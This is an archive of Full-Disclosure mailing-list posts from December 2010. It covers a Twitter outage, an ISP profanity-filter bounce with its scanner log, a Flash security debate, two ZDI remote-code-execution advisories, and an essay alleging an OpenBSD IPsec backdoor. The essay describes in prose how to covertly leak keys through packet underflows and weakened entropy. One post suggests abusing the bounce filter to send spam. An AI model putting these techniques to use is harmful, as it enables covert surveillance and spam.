http://status.twitter.com -j On Thu, Dec 23, 2010 at 12:23 PM, Georgi Guninski gunin...@guninski.commailto:gunin...@guninski.com wrote: How long was the twitter outage from yesterday coinciding with the other outage? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How long was the twitter outage?
No doubt someone will bitch at me for asking this but, why on earth is this being discussed on full-disclosure? lol. On Thu, Dec 23, 2010 at 10:46 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I tried to check your status blog, but the site is down for me. Just sayin’. t *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *John Adams *Sent:* Thursday, December 23, 2010 1:40 PM *To:* Georgi Guninski *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] How long was the twitter outage? The site was not down for all users. A small number of users were affected by the failure of specific database node. Please see our status blog for details. http://status.twitter.com -j On Thu, Dec 23, 2010 at 12:23 PM, Georgi Guninski gunin...@guninski.com wrote: How long was the twitter outage from yesterday coinciding with the other outage? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How long was the twitter outage?
Oh noes, my email fell under the category of Common Mild profanity. Profanity content filtering is ridiculous, it's the kinda thing not even most parents would do on their kids computers. I can understand filtering outgoing mail for profanity if it is a corporate company, but ffs lol. -- Forwarded message -- From: r...@bellaliant.ca Date: Thu, Dec 23, 2010 at 11:29 PM Subject: Your email message was blocked To: cal.leem...@simplicitymedialtd.co.uk The following email message was *blocked* by Bell Aliant Content Filtering Device: *From:* cal.leem...@simplicitymedialtd.co.uk *To:*peter.mo...@bellaliant.ca *Subject:* Re: [Full-disclosure] How long was the twitter outage? *Message:* B4d13db61.0001.0003.mml Because it may contain *unacceptable language*, or *inappropriate material*. Please remove any unacceptable or inappropriate language and resend the message. The blocked email will be automatically deleted after *5 days. * Content Rule: Policy Management (Inbound) : Block Common Mild Profanity r...@bellaliant.ca On Thu, Dec 23, 2010 at 11:18 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Because Georgi has “reputation points left.” He can say whatever he wants. J *From:* Cal Leeming [Simplicity Media Ltd] [mailto: cal.leem...@simplicitymedialtd.co.uk] *Sent:* Thursday, December 23, 2010 3:13 PM *To:* Thor (Hammer of God) *Cc:* John Adams; Georgi Guninski; full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] How long was the twitter outage? No doubt someone will bitch at me for asking this but, why on earth is this being discussed on full-disclosure? lol. On Thu, Dec 23, 2010 at 10:46 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I tried to check your status blog, but the site is down for me. Just sayin’. t *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *John Adams *Sent:* Thursday, December 23, 2010 1:40 PM *To:* Georgi Guninski *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] How long was the twitter outage? The site was not down for all users. A small number of users were affected by the failure of specific database node. Please see our status blog for details. http://status.twitter.com -j On Thu, Dec 23, 2010 at 12:23 PM, Georgi Guninski gunin...@guninski.com wrote: How long was the twitter outage from yesterday coinciding with the other outage? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How long was the twitter outage?
LOL. I got one too. Maybe we should all send emails telling him his filter isn't worth hen shit on a pump handle! The following email message was blocked by Bell Aliant Content Filtering Device: From: t...@hammerofgod.commailto:t...@hammerofgod.com To:peter.mo...@bellaliant.camailto:peter.mo...@bellaliant.ca Subject: Re: [Full-disclosure] How long was the twitter outage? Message: B4d13d9050001.0001.0003.mml Because it may contain unacceptable language, or inappropriate material. Please remove any unacceptable or inappropriate language and resend the message. The blocked email will be automatically deleted after 5 days. Content Rule: Policy Management (Inbound) : Block Common Mild Profanity r...@bellaliant.camailto:r...@bellaliant.ca From: Cal Leeming [Simplicity Media Ltd] [mailto:cal.leem...@simplicitymedialtd.co.uk] Sent: Thursday, December 23, 2010 3:34 PM To: Thor (Hammer of God); full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How long was the twitter outage? Oh noes, my email fell under the category of Common Mild profanity. Profanity content filtering is ridiculous, it's the kinda thing not even most parents would do on their kids computers. I can understand filtering outgoing mail for profanity if it is a corporate company, but ffs lol. -- Forwarded message -- From: r...@bellaliant.camailto:r...@bellaliant.ca Date: Thu, Dec 23, 2010 at 11:29 PM Subject: Your email message was blocked To: cal.leem...@simplicitymedialtd.co.ukmailto:cal.leem...@simplicitymedialtd.co.uk The following email message was blocked by Bell Aliant Content Filtering Device: From: cal.leem...@simplicitymedialtd.co.ukmailto:cal.leem...@simplicitymedialtd.co.uk To:peter.mo...@bellaliant.camailto:peter.mo...@bellaliant.ca Subject: Re: [Full-disclosure] How long was the twitter outage? Message: B4d13db61.0001.0003.mml Because it may contain unacceptable language, or inappropriate material. Please remove any unacceptable or inappropriate language and resend the message. The blocked email will be automatically deleted after 5 days. Content Rule: Policy Management (Inbound) : Block Common Mild Profanity r...@bellaliant.camailto:r...@bellaliant.ca On Thu, Dec 23, 2010 at 11:18 PM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: Because Georgi has reputation points left. He can say whatever he wants. :) From: Cal Leeming [Simplicity Media Ltd] [mailto:cal.leem...@simplicitymedialtd.co.ukmailto:cal.leem...@simplicitymedialtd.co.uk] Sent: Thursday, December 23, 2010 3:13 PM To: Thor (Hammer of God) Cc: John Adams; Georgi Guninski; full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How long was the twitter outage? No doubt someone will bitch at me for asking this but, why on earth is this being discussed on full-disclosure? lol. On Thu, Dec 23, 2010 at 10:46 PM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: I tried to check your status blog, but the site is down for me. Just sayin'. t From: full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of John Adams Sent: Thursday, December 23, 2010 1:40 PM To: Georgi Guninski Cc: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How long was the twitter outage? The site was not down for all users. A small number of users were affected by the failure of specific database node. Please see our status blog for details. http://status.twitter.com -j On Thu, Dec 23, 2010 at 12:23 PM, Georgi Guninski gunin...@guninski.commailto:gunin...@guninski.com wrote: How long was the twitter outage from yesterday coinciding with the other outage? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FW: Your email message was blocked
Classic. Just send him an email with the link you want from whatever address you want, and you can spam people with the subject, including links. :) From: r...@bellaliant.ca [mailto:r...@bellaliant.ca] Sent: Thursday, December 23, 2010 4:40 PM To: Jimmy Jank the Wanksta Subject: Your email message was blocked The following email message was blocked by Bell Aliant Content Filtering Device: From: t...@hammerofgod.commailto:t...@hammerofgod.com To:r...@bellaliant.camailto:r...@bellaliant.ca Subject: You did this??? http://www.bloggersbase.com/humor/assbomber-harbinger-of-a-new-era-the-anal-jihad/ Message: B4d13ebf6.0001.0003.mml Because it may contain unacceptable language, or inappropriate material. Please remove any unacceptable or inappropriate language and resend the message. The blocked email will be automatically deleted after 5 days. Content Rule: Policy Management (Inbound) : Block Common Mild Profanity r...@bellaliant.camailto:r...@bellaliant.ca 6724 20:40:22.824 23 Dec 2010 - B4d13ebf6.0001.0003.mml 6724 20:40:22.824 Message From t...@hammerofgod.com, Return-path t...@hammerofgod.com, Recipients (1) - r...@bellaliant.ca 6724 20:40:22.824 Thread 1 Starting to unpack B4d13ebf6.0001.0003.mml 6724 20:40:22.824 MimeTags::Process tag Content-Language = en-US 6724 20:40:22.824 MimeTags::Process tag Content-Type = multipart/related; boundary=_004_58DB1B68E62B9F448DF1A276B0886DF16EBB501BEX2010hammerofg_; type=multipart/alternative 6724 20:40:22.824 MimeTags::Process tag Content-Type = multipart/alternative; boundary=_000_58DB1B68E62B9F448DF1A276B0886DF16EBB501BEX2010hammerofg_ 6724 20:40:22.824 MimeTags::Process tag Content-Type = text/plain; charset=us-ascii 6724 20:40:22.824 MimeTags::Process tag Content-Transfer-Encoding = quoted-printable 6724 20:40:22.824 Encoding quoted-printable 6724 20:40:22.824 Quoted-Printable encoded section consumed 289 bytes - file D:\MailMarshal\Unpacking\T1\U2\Quoted-Printable.txt 6724 20:40:22.824 MimeTags::Process tag Content-Type = text/html; charset=us-ascii 6724 20:40:22.824 MimeTags::Process tag Content-Transfer-Encoding = quoted-printable 6724 20:40:22.824 Encoding quoted-printable 6724 20:40:22.824 Quoted-Printable encoded section consumed 3365 bytes - file D:\MailMarshal\Unpacking\T1\U2\Quoted-Printable_1.txt 6724 20:40:22.824 UnpackComposite: End boundary found - unwinding 6724 20:40:22.824 MimeTags::Process tag Content-Type = image/png; name=image001.png 6724 20:40:22.824 MimeTags::Process tag Content-Description = image001.png 6724 20:40:22.824 MimeTags::Process tag Content-Disposition = inline; filename=image001.png; size=1020; creation-date=Fri, 24 Dec 2010 00:40:12 GMT; modification-date=Fri, 24 Dec 2010 00:40:12 GMT 6724 20:40:22.824 MimeTags::Process tag Content-ID = image001@01cba2c0.1104f830 6724 20:40:22.824 MimeTags::Process tag Content-Transfer-Encoding = base64 6724 20:40:22.824 Encoding base64 6724 20:40:22.824 Base64 encoded section consumed 1396 bytes - file D:\MailMarshal\Unpacking\T1\U2\image001.png 6724 20:40:22.824 UnpackComposite: End boundary found - unwinding 6724 20:40:22.824 Type=MAIL, size=8463, Name=B4d13ebf6.0001.0003.mml 6724 20:40:22.824 Type=MHDR, size=2378, Name=MsgHeader.txt 6724 20:40:22.824 Type=MBODY, size=289, Name=Quoted-Printable.txt 6724 20:40:22.824 Type=MBODY, size=3242, Name=Quoted-Printable_1.txt 6724 20:40:22.824 Type=PNG, size=1020, Name=image001.png 6724 20:40:22.824 1 user(s) match ruleset - Connection Policies 6724 20:40:22.824 0 user(s) match rule - NSP-SEC Email Rule - BA 6724 20:40:22.824 0 user(s) match rule - Delete Postmaster messages - BA 6724 20:40:22.824 1 user(s) match ruleset - Virus Threats (Inbound) 6724 20:40:22.824 1 user(s) match rule - Block Virus 6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file B4d13ebf6.0001.0003.mml after 16 millisecs 6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file MsgHeader.txt after 0 millisecs 6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file Quoted-Printable.txt after 0 millisecs 6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file Quoted-Printable_1.txt after 0 millisecs 6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file image001.png after 0 millisecs 6724 20:40:22.840 Name=U1\B4d13ebf6.0001.0003.mml (MAIL,8463) False 6724 20:40:22.840 Name=U2\MsgHeader.txt (MHDR,2378) False 6724 20:40:22.840 Name=U2\Quoted-Printable.txt (MBODY,289) False 6724 20:40:22.840 Name=U2\Quoted-Printable_1.txt (MBODY,3242) False 6724 20:40:22.840 Name=U2\image001.png (PNG,1020) False 6724 20:40:22.840 1 user(s) match rule - Block Known Threats 6724 20:40:22.840 Name=U1\B4d13ebf6.0001.0003.mml (MAIL,8463) False 6724 20:40:22.840 1 user(s) match rule - Block Known Virus Attachments 6724 20:40:22.840
Re: [Full-disclosure] FW: Your email message was blocked
LOL nicely spotted :D On Fri, Dec 24, 2010 at 12:42 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: Classic. Just send him an email with the link you want from whatever address you want, and you can spam people with the subject, including links. :) From: r...@bellaliant.ca [mailto:r...@bellaliant.ca] Sent: Thursday, December 23, 2010 4:40 PM To: Jimmy Jank the Wanksta Subject: Your email message was blocked The following email message was blocked by Bell Aliant Content Filtering Device: From: t...@hammerofgod.commailto:t...@hammerofgod.com To:r...@bellaliant.camailto:r...@bellaliant.ca Subject: You did this??? http://www.bloggersbase.com/humor/assbomber-harbinger-of-a-new-era-the-anal-jihad/ Message: B4d13ebf6.0001.0003.mml Because it may contain unacceptable language, or inappropriate material. Please remove any unacceptable or inappropriate language and resend the message. The blocked email will be automatically deleted after 5 days. Content Rule: Policy Management (Inbound) : Block Common Mild Profanity r...@bellaliant.camailto:r...@bellaliant.ca ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FW: Your email message was blocked
You can also use it for deliverability testing against the anti-spam/anti-virus solution they use (check the headers). It's loltastic. On Dec 23, 2010, at 4:42 PM, Thor (Hammer of God) wrote: Classic. Just send him an email with the link you want from whatever address you want, and you can spam people with the subject, including links. J From: r...@bellaliant.ca [mailto:r...@bellaliant.ca] Sent: Thursday, December 23, 2010 4:40 PM To: Jimmy Jank the Wanksta Subject: Your email message was blocked The following email message was blocked by Bell Aliant Content Filtering Device: From: t...@hammerofgod.com To:r...@bellaliant.ca Subject: You did this??? http://www.bloggersbase.com/humor/assbomber-harbinger-of-a-new-era-the-anal-jihad/ Message: B4d13ebf6.0001.0003.mml Because it may contain unacceptable language, or inappropriate material. Please remove any unacceptable or inappropriate language and resend the message. The blocked email will be automatically deleted after 5 days. Content Rule: Policy Management (Inbound) : Block Common Mild Profanity r...@bellaliant.ca B4d13ebf6.0001.0003.log___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] adobe.com important subdomain SQL injection again!
However, with the debut of HTML 5, we're finding that video is being offloaded to video and open codecs are being integrated into browsers. Further, HTML 5's media capabilities are making flash cumbersome. Not to resurrect a dead thread, but Microsoft's Silverlight applied a lot of lessons from Flash: BlueHat v9: RIA Security: Real-World Lessons from Flash and Silverlight, http://technet.microsoft.com/en-us/security/video/ee834904. At least some folks are learning from Adobe's mistakes. Jeff On Sun, Dec 19, 2010 at 7:56 PM, Victor Rigo victor_r...@yahoo.com wrote: Concurred. No file format is as obnoxious as SWF. However, with the debut of HTML 5, we're finding that video is being offloaded to video and open codecs are being integrated into browsers. Further, HTML 5's media capabilities are making flash cumbersome. Try disabling flash extension on Firefox and enjoy real internet. Victor Rigo, CISSP Independent Computer Security Consultant Buenos Aires, AR +5411-4316-1901 --- On *Sun, 12/19/10, Christian Sciberras uuf6...@gmail.com* wrote: From: Christian Sciberras uuf6...@gmail.com Subject: Re: [Full-disclosure] adobe.com important subdomain SQL injection again! To: Marsh Ray ma...@extendedsubset.com Cc: Victor Rigo victor_r...@yahoo.com, full-disclosure@lists.grok.org.uk Date: Sunday, December 19, 2010, 9:25 PM Personally, I kind of like Flash. It gives me a single kill switch for 90% of the useless blinking crap and popups on the internet. Flash is a really appropriate name for exactly what I don't want to see on a web page. I hope it remains the platform of choice for those who develop such things. - Marsh Ray I'll keep using that quote till I die... On Sun, Dec 19, 2010 at 9:32 PM, Marsh Ray ma...@extendedsubset.comhttp://mc/compose?to=ma...@extendedsubset.com wrote: On 12/18/2010 05:30 PM, Victor Rigo wrote: Let's see, flash is: - Cross-platform - Cross-architecture - Has it's own programming language - Is embedded on websites - Access to javascript to popup, local caches, etc. Not on my machine? It's not ineptness, it's what you get when you right software that can actually do stuff. Adobe comes from a time when you could write PC software without caring about security. Yeah, it was a heck of a lot easier to write just about anything back then because it was well and proper that anything could do anything. Nowdays, the first questions after hey our software could do this must be but should it do that? What else could someone leverage that new capability to do? How does it combine with every other feature in our app or even on the whole platform? What if somebody does it repeatedly in a tight loop? With pathological inputs? and so on. These questions take a long time to answer. So if a vendor is known for letting app developers do more stuff and not also known for letting users control what stuff gets done on their own machines then they are laggards, not leaders, in my view. If Java applets were still the hip thing, you'd see the same thing about that. There's undoubtedly some truth to that. But at the same time, it doesn't seem like a useful line of reasoning: * It's still not an argument for using Flash. * That Java plugins have had chronic security bugs doesn't mean that Flash doesn't suck too. * You seem to imply that you don't think that Adobe is likely to secure Flash any time soon. You're not saying Adobe will secure Flash in the next patch and then it will be great. But you listed all the great stuff it does, so I have to think you would have said something like that if you believed it. You may be making Flash look worse than it is. * It's basically an appeal to futility argument: no one could make a development platform and browser plugin that is significantly more secure (or does a better job of managing the security vs. doing stuff trade off) so therefore we should accept the status quo. That's why it's not useful: it gives no guidance on directions in which to improve. Personally, I kind of like Flash. It gives me a single kill switch for 90% of the useless blinking crap and popups on the internet. Flash is a really appropriate name for exactly what I don't want to see on a web page. I hope it remains the platform of choice for those who develop such things. - Marsh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-293: HP StorageWorks Storage Mirroring DoubleTake.exe Remote Code Execution Vulnerability
ZDI-10-293: HP StorageWorks Storage Mirroring DoubleTake.exe Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-293 December 23, 2010 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard StorageWorks -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10747. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP StorageWorks Storage Mirroring. Authentication is not required to exploit this vulnerability. The flaw exists within the DoubleTake.exe component which listens by default on TCP port 6320. When handling an incoming packet the process blindly trusts a user supplied length for a copy of arbitrary data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user. -- Vendor Response: Hewlett-Packard has issued an update to correct this vulnerability. More details can be found at: http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02660122 -- Disclosure Timeline: 2010-09-27 - Vulnerability reported to vendor 2010-12-23 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * AbdulAziz Hariri of ThirdEyeTesters -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] how i stopped worrying and loved the backdoor
http://mickey.lucifier.net/b4ckd00r.html how i stopped worrying and loved the backdoor first of all i have to mention that netsec involvement was indirectly one of the first financial successes of theo de raadt (later mr.t for short) as the sale of 2500 cds through the EOUSA project (one for each us-ins office in the country) brought openbsd to profitable state and allowed mr.t to finance his living by means of the openbsd project. but let us get back to our sheep (so to speak). as the disclosure from herr gregory perry mentioned the parts involved were ipsec(4)) and crypto(4)) framework and the gigabit ethernet stack. but see? there is no such thing as gigabit ethernet stack. moreover back then all the gigabit ethernet drivers came from freebsd. they were written almost exclusively by bill paul who worked at columbia.edu. he himself does not always disclose where he gets the docs or other tech info for the driver development. drivers were ported to openbsd by jason@ (later mr.j). angelos@ (later mr.a) (who was contracted by netsec to work on the crypto framework in openbsd) was a post-grad student at upenn.edu at the time had contacts at columbia such as his friend and fellow countryman ji@ who worked there. ji@ wrote the ipsec stack initially (for bsd/os 2.0) in 1995. mr.a was porting it to openbsd. if memory serves me right it was during the summer of 2002 that a micro-hacking-session was held at columbia.edu. for less than one week participating all the well known to us already mr.t and mr.j and mr.a with an addition of drahn@ and yours truly. primary goal was to hack on the OCF (crypto framework in openbsd). this does not affect crypto algorithms you'd say right? but why try to plant subtle and enormously complicated to develop side channels into math (encryption and hashing) when it's way easier to just make the surrounding framework misbehave and leak bits elsewhere? why not just semioccasionally send an ipsec(4)) packet with a plain text key appended to it? the receiver will drop it as broken (check your ipsec stats!) and the sniffer in the middle has the key! how would one do it? a little mbuf(9)) underflow combined with a little integer overflow. not that easy to spot if more than just one line of code is involved. but this is just a really crude example. leaking by just tiny bits over longer time period would be even more subtle. here are just some observations i had made during ipsec hacking years later... some parts of ipsec code were to say at least strange looking. in some places tiny loops were used where normally one would use a function (such as memcpy(3)) or a bulk random data fetch instead of fetching byte by byte. one has to know that to generate 16 bytes of randomness by the random(4) driver (not the arc4 bit) it would take an md5 algorithm run over 4096 bytes of the entropy pool. of course to generate only one byte 15 bytes would have to be wasted. and thus fetching N bytes one-by-one instead of filling a chunk would introduce a measurable time delay. ain't these look like pieces of timing weaknesses introduced in ipsec processing in order to make encrypted data analysis easier? some code pieces created buffer underflows leaving uninitialised data or in other words leaking information as well. a common technique to hide changes was (and still is sometimes) to shuffle the code around the file or betweeen different files and directories making actual code review a nightmare. but to be just lots of those things had been since fixed (even by meself). as the great ones teach us an essential part of any cryptographical system is the random numbers generator. your humble servant was involved in it too and right there in yer olde brooklyn. one breezy spring night i wrote the openbsd random(4) driver that was based on the linux driver written by theodore tso. and of course the output has never been statistically analysed since the day i wrote it. no doubt i ran some basic tests with help of mamasita (she's keen on math and blintzi). later the arc4 part was added by david maziers (dm@) who was also a friend of mr.a at the time and an openbsd developer. since then a number of vulnerabilities were discovered in the arc4 algorithm and subsequently the driver. most notably this potential key leak. meanwhile in calgary... wasting no time netsec was secretly funnelling security fixes through mr.t that he was committing stealth into openbsd tree. (this i only knew years later when i was telling mr.t over a beer about the funny people i met on a west-coast trip (see later)). stealth means that purpose of the diffs was not disclosed in the commit messages or the private openbsd development forums except with a few trusted developers. it was a custom to hide important development in the openbsd project at that time due to a large netbsd-hate attitude (which also existed from the other side in form of openbsd-hate attitude; just check out this netbsd diff and an openbsd fix later; or a more recent
[Full-disclosure] ZDI-10-294: Rocket U2 Uni RPC Service Remote Code Execution Vulnerability
ZDI-10-294: Rocket U2 Uni RPC Service Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-294 December 23, 2010 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Rocket -- Affected Products: Rocket U2 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6257. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of multiple products from multiple vendors that utilize the Uni RPC protocol. Authentication is not required to exploit this vulnerability. The specific flaw exists in the Uni RPC service (unirpcd.exe) which listens by default on TCP port 31438. The unirpc32.dll module implements an RPC protocol and is used by the Uni RPC service. While parsing a size value from an RPC packet header, an integer can overflow and consequently bypass a signed comparison. This controlled value is then used as the number of bytes to receive into a static heap buffer. By providing a specially crafted request, this heap buffer can overflow leading to arbitrary code execution under the context of the SYSTEM user. -- Vendor Response: Rocket states: Rocket U2 states that this issue was first fixed in: UniVerse 10.3.9 and UniData 7.2.8. Recommended fix pack version: UniVerse 10.3.9 and above or UniData 7.2.8 and above. Please contact your software partner or u...@rs.com to obtain a fixed version for UCC-676. -- Disclosure Timeline: 2010-07-20 - Vulnerability reported to vendor 2010-12-23 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Ruben Santamarta -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how i stopped worrying and loved the backdoor
On 12/23/2010 10:01 PM, Григорий Братислава wrote: http://mickey.lucifier.net/b4ckd00r.html how i stopped worrying and loved the backdoor Note that much of that is backed up by CVS history. I'd seen some of those strange loops and bulk reformatting while reviewing the code commits last week. For example, as he mentions in P2 the entropy pool extraction functions are implemented in such a way as to require 156 times more invocations of the MD5 block compression function than are necessary. This remains in the code today. I even pointed some of this out the other day on this thread: http://marc.info/?l=openbsd-techm=129298665720095w=2 Perhaps the reaction speaks louder than words. I'd had mickey's name on my short list -- and had written 'not netsec' beside it. :-) This is either something really interesting going on or the most spectacular trolling in net history. - Marsh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how i stopped worrying and loved the backdoor
On Thu, Dec 23, 2010 at 10:00 PM, Marsh Ray ma...@extendedsubset.com wrote: ... how i stopped worrying and loved the backdoor Note that much of that is backed up by CVS history. ... For example, as he mentions in P2 the entropy pool extraction functions intelligently constraining key space and / or leaking key bits is the Right Way (tm) to do a backdoor. it requires knowledge of the particulars to execute and provides more robustness than a class break / full key leak. i hear they've got clusters of key crackers for searching reasonable spaces ;) also, this may not be limited to entropy pool. it would make much sense to combine elements of hardware accelerated crypto drivers with entropy reduction or key leakage to target specific installations or further obfuscate effects, as mentioned in the thread so linked. (and you could be pretty precise with such key space degradation, if desired!) I even pointed some of this out the other day on this thread: http://marc.info/?l=openbsd-techm=129298665720095w=2 Perhaps the reaction speaks louder than words. good entropy is hard, is the theme of that thread. how do you measure entropy? a few bytes and i've turned terabytes of entropy into simple order. the debian openssl weak key debacle underscores just how difficult and obscure such technicalities are in the face of random human failures. a well funded adversary with specific targets and significant skill would enjoy plentiful opportunity and success. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how i stopped worrying and loved the backdoor
On Thu, Dec 23, 2010 at 10:57 PM, coderman coder...@gmail.com wrote: ... good entropy is hard, is the theme of that thread. http://marc.info/?l=openbsd-techm=129304878126089w=2 I agree that there's a good paper in this, I would love to see the entropy added by the multi-consumer model quantified, or even an upper bound placed on it. In the past when I've given my talk on randomness in the OpenBSD network stack, I've discussed this and I always ask for someone to come forward with such a paper. Unfortunately I don't get the impression that the amateur cryptographers questioning the OpenBSD PRNG are qualified to produce such a paper (if they were, they wouldn't be mailing here, they'd be submitting it to real cryptographers for peer review) perhaps musnt live will respond with a formal proof of entropy bound in obsd... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FW: Your email message was blocked
